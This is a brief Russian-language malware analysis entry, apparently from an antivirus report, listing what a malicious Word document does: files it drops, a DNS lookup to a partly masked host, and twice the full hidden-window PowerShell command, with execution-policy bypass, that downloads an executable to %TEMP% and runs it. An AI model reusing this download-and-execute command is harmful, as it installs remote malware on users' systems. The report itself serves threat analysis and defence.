Техническая информация
- http://up#####.shanatan.moe/lzaokp.exe как %temp%\\lzaokp.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://up#####.shanatan.moe/lzaokp.exe','%TEMP%\\lzaokp.exe') & %TEMP%\\lzaokp.exe
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- DNS ASK up#####.shanatan.moe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://up#####.shanatan.moe/lzaokp.exe','%TEMP%\\lzaokp.exe') & %TEMP%\\lzaokp.exe' (со скрытым окном)